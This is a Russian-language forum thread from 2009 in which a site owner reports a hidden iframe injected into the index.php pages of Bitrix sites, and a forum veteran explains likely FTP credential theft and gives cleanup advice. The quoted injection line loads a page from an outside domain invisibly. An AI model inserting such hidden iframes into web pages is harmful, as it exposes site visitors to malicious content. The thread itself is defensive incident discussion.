Имя пользователя:
Пароль:  
Помощь | Регистрация | Забыли пароль?  | Правила  

Компьютерный форум OSzone.net » Информационная безопасность » Защита компьютерных систем » Вопрос - [решено] Эксплойт на индексных страницах сайта

Ответить
Настройки темы
Вопрос - [решено] Эксплойт на индексных страницах сайта

Новый участник


Сообщения: 5
Благодарности: 0

Профиль | Отправить PM | Цитировать


Здравствуйте!

Хотел поделиться с Вами проблемой и попросить помощи, может быть Вы с этим сталкивались.
Сегодня нами был обнаружен эксплойт на большинстве индексовых страниц(index.php) наших сайтов на VPS-сервере хостинга hc и на nichoste.
Эксплойт вида:

<div style="display:none"><iframe src="http://theanotherlife.ru:8080/index.php" width=497 height=546 ></iframe></div>

Сайты базируются на CMS Bitrix.

Дата изменения файлов показывает, что активность проявлялась вчера в районе 10 вечера на VPS и в 2-3 на никхосте. Техподдержка на никхосте не смогла посоветовать ничего вразумительного, сейчас отписался в нс.

Главные подозреваемые: битрикс, какой-нибудь из локальных кампов, имевших доступ к фтп.

Локальные компьютеры, имевшие доступ к фтп на VPS, сейчас проверяются всевозможными средствами, были изменены пароли к фтп и почищены все инексные страницы.

Что Вы могли посоветовать в данной ситуации?

Отправлено: 17:52, 17-09-2009

 

Старожил


Сообщения: 223
Благодарности: 53

Профиль | Отправить PM | Цитировать


Цитата emiljen:
какой-нибудь из локальных кампов, имевших доступ к фтп. »
Чаще всего именно это ибывает. Пароли доступа к FTP лень набирать ручками, сохраняются на компе, затем рано или поздно, подхватывается вируснячок, их уводящий. И заливается на ваши страницы зараза. Может быть конечно и уязвимость на серверах, но ... - взлом приблизительно в одно и то же время на разных хостингах с заливкой одного и того же скрипта - с трудом верится, что такое возможно, без утечки на стороне разработчика сайтов (вебмастера, тестировщика...). И потом, как я понял, нет данных о заражении других клиентов хостинга.
Цитата emiljen:
Локальные компьютеры, имевшие доступ к фтп на VPS, сейчас проверяются всевозможными средствами, были изменены пароли к фтп и почищены все инексные страницы. »
Правильно, это в первую очередь. Насчет руткитов поищите.
Цитата emiljen:
Что Вы могли посоветовать в данной ситуации? »
После того, как проделаете все проверки на локальных компах, обратите внимание на возможные оставшиеся сохраненные на клиентах пароли (управление контентом, обозреватели, клиенты FTP, даже FAR в том числе) проверьте, нет ли следов в защищенном хранилище Windows. Есть для этого специальные утилиты. Nirsoft. Старые пароли - бог с ними, а новые не сохраняйте никогда и нигде, иначе рано или поздно ситуация повторится.
Цитата emiljen:
<div style="display:none"><iframe src="http://theanotherlife.ru:8080/index.php" width=497 height=546 ></iframe></div> »
А это что-то странное, обычно iframe используют с размерами 1Х1 для сокрытия. Хотя "display:none", может и есть смысл не указывать подозрительные размеры. Наверно какие-то детишки тренируются или не доделана цепочка использования взломанных серверов. Загружается пустая страница, сервер отвечает только заголовками, ничего интересного или опасного сейчас по этой ссылке нет.

-------
Переустановка Windows - как разморозка холодильника. Помогает, но ненадолго...


Последний раз редактировалось ab57, 18-09-2009 в 12:25.

Это сообщение посчитали полезным следующие участники:

Отправлено: 12:05, 18-09-2009 | #2



Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети.

Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля.



Компьютерный форум OSzone.net » Информационная безопасность » Защита компьютерных систем » Вопрос - [решено] Эксплойт на индексных страницах сайта

Участник сейчас на форуме Участник сейчас на форуме Участник вне форума Участник вне форума Автор темы Автор темы Шапка темы Сообщение прикреплено

Похожие темы
Название темы Автор Информация о форуме Ответов Последнее сообщение
отсутствие картинок в сохранённых интернет-страницах vlad58105 Хочу все знать 0 23-01-2010 20:23
[решено] как в firefox сделать полужирный шрифт на страницах dima1981 Хочу все знать 3 14-06-2009 17:42
Работа с контролами на страницах Excel EugeneAbl AutoIt 8 28-02-2009 09:22
[решено] Зачем прикрепленные темы фигурируют на второй и последующих страницах раздела? truvo О сайте и форуме 1 17-06-2008 20:41
Размещение информации на страницах LVVictor Вебмастеру 14 22-01-2006 21:14




 
Переход